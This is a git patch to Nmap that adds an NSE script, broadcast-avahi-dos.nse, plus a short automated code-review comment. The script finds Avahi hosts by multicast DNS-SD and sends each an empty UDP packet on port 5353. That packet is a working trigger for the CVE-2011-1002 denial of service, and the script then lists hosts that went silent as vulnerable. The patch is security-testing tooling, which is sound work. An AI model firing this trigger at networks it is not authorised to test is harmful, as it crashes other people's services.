From 9e60e88eca054d845c7219fb8b29d1466f619123 Mon Sep 17 00:00:00 2001 From: djalal Date: Mon, 2 May 2011 23:38:18 +0000 Subject: [PATCH] o [NSE] Added broadcast-avahi-dos.nse, which tries to detect if the hosts in the local network that are running Avahi are vulnerable to the NULL UDP packet denial of service (CVE-2011-1002). --- CHANGELOG | 4 ++ scripts/broadcast-avahi-dos.nse | 105 ++++++++++++++++++++++++++++++++ scripts/script.db | 1 + 3 files changed, 110 insertions(+) create mode 100644 scripts/broadcast-avahi-dos.nse diff --git a/CHANGELOG b/CHANGELOG index c263a56ce..6530fe982 100644 --- a/CHANGELOG +++ b/CHANGELOG @@ -1,5 +1,9 @@ # Nmap Changelog ($Id$); -*-text-*- +o [NSE] Added broadcast-avahi-dos.nse, which tries to detect if the + hosts in the local network that are running Avahi are vulnerable to + the NULL UDP packet denial of service (CVE-2011-1002). [Djalal] + o [Zenmap] Fixed an error that could cause a crash ("TypeError: an integer is required") if a sort column in the ports table was unset. [David] diff --git a/scripts/broadcast-avahi-dos.nse b/scripts/broadcast-avahi-dos.nse new file mode 100644 index 000000000..94b874cbc --- /dev/null +++ b/scripts/broadcast-avahi-dos.nse 
@@ -0,0 +1,105 @@
+description=[[
+Attempts to discover hosts in the local network using the DNS Service
+Discovery protocol and sends a NULL UDP packet to each host to test
+if it is vulnerable to the Avahi NULL UDP packet denial of service
+(CVE-2011-1002).
+
+The broadcast-avahi-dos.wait script argument specifies how
+many number of seconds to wait before a new attempt of host discovery.
+Each host who does not respond to this second attempt will be considered
+vulnerable.
+
+Reference:
+* http://avahi.org/ticket/325
+* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1002
+]]
+
+
+---
+-- @usage
+-- nmap --script=broadcast-avahi-dos
+--
+-- @output
+-- | broadcast-avahi-dos:
+-- | Discovered hosts:
+-- | 10.0.1.150
+-- | 10.0.1.151
+-- | After NULL UDP avahi packet DoS (CVE-2011-1002).
+-- | Hosts that seem down (vulnerable):
+-- |_ 10.0.1.151
+--
+-- @args broadcast-avahi-dos.wait Wait time in seconds before executing
+-- the check, the default value is 20 seconds.
+
+
+author = "Djalal Harouni"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"broadcast", "dos", "intrusive", "vuln"}
+
+require 'stdnse'
+require 'dnssd'
+
+prerule = function() return true end
+
+avahi_send_null_udp = function(ip)
+ local socket = nmap.new_socket("udp")
+ local status = socket:sendto(ip, 5353, "")
+ socket:close()
+ return status
+end
+
+action = function()
+ local wtime = stdnse.get_script_args("broadcast-avahi-dos.wait") or 20
+ local helper = dnssd.Helper:new()
+ helper:setMulticast(true)
+
+ local status, result = helper:queryServices()
+ if (status) then
+ local output, hosts, tmp = {}, {}, {}
+ for _, hostcfg in pairs(result) do
+ for k, ip in pairs(hostcfg) do
+ if type(k) == "string" and k == "name" then
+ if avahi_send_null_udp(ip) then
+ table.insert(hosts, ip)
+ tmp[ip] = true
+ end
+ end
+ end
+ end
+
+ if next(hosts) then
+ hosts.name = "Discovered hosts:"
+ table.insert(output, hosts)
+ table.insert(output,
+ "After NULL UDP avahi packet DoS (CVE-2011-1002).")
+
+ stdnse.print_debug(3, "sleeping for %d seconds", wtime)
+ stdnse.sleep(wtime)
+ -- try to re-discover hosts
+ status, result = helper:queryServices()
+ if (status) then
+ for _, hostcfg in pairs(result) do
+ for k, ip in pairs(hostcfg) do
+ if type(k) == "string" and k == "name" and tmp[ip] then
+ tmp[ip] = nil
+ end
+ end
+ end
+ end
+
+ local vulns = {}
+ for ip, _ in pairs(tmp) do
+ table.insert(vulns, ip)
+ end
+
+ if next(vulns) then
+ vulns.name = "Hosts that seem down (vulnerable):"
+ table.insert(output, vulns)
+ else
+ table.insert(output, "Hosts are all up (not vulnerable).")
+ end
+
+ return stdnse.format_output(true, output)
+ end
+ end
+end
diff --git a/scripts/script.db b/scripts/script.db
index 9f0c4e1f7..64939d89e 100644
--- a/scripts/script.db
+++ b/scripts/script.db
@@ -8,6 +8,7 @@ Entry { filename = "auth-owners.nse", categories = { "default", "safe", } }
 Entry { filename = "auth-spoof.nse", categories = { "malware", "safe", } }
 Entry { filename = "backorifice-info.nse", categories = { "default", "discovery", "safe", } }
 Entry { filename = "banner.nse", categories = { "discovery", "safe", } }
+Entry { filename = "broadcast-avahi-dos.nse", categories = { "broadcast", "dos", "intrusive", "vuln", } }
 Entry { filename = "broadcast-dns-service-discovery.nse", categories = { "broadcast", "safe", } }
 Entry { filename = "broadcast-dropbox-listener.nse", categories = { "broadcast", "safe", } }
 Entry { filename = "broadcast-ms-sql-discover.nse", categories = { "broadcast", "discovery", "safe", } }
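Review bot: When the second `helper:queryServices()` after the sleep returns a false status, `tmp` is left untouched and every discovered host ends up under "Hosts that seem down (vulnerable):", so a failed or timed-out re-discovery is reported as confirmed crashes; the `if (status) then` guarding the re-discovery loop needs an else branch that reports the failure instead, e.g. `else table.insert(output, "Re-discovery failed: " .. tostring(result)) return stdnse.format_output(true, output) end`. The `wtime` value is used as a number by `stdnse.sleep` and the `%d` in `stdnse.print_debug` but is taken straight from the script argument, where it arrives as a string, so a non-numeric value raises; `local wtime = tonumber(stdnse.get_script_args("broadcast-avahi-dos.wait")) or 20` pins that down. If the dnssd result can list one address under several services (the result shape is not visible here), the first loop sends a datagram and appends to `hosts` once per entry, duplicating both the probe and the output line; `if not tmp[ip] and avahi_send_null_udp(ip) then` keeps it to one per host. Also worth noting in a comment on `avahi_send_null_udp` that the second return value of `socket:sendto` (the error string) is discarded, so a send failure is silently treated as "not probed".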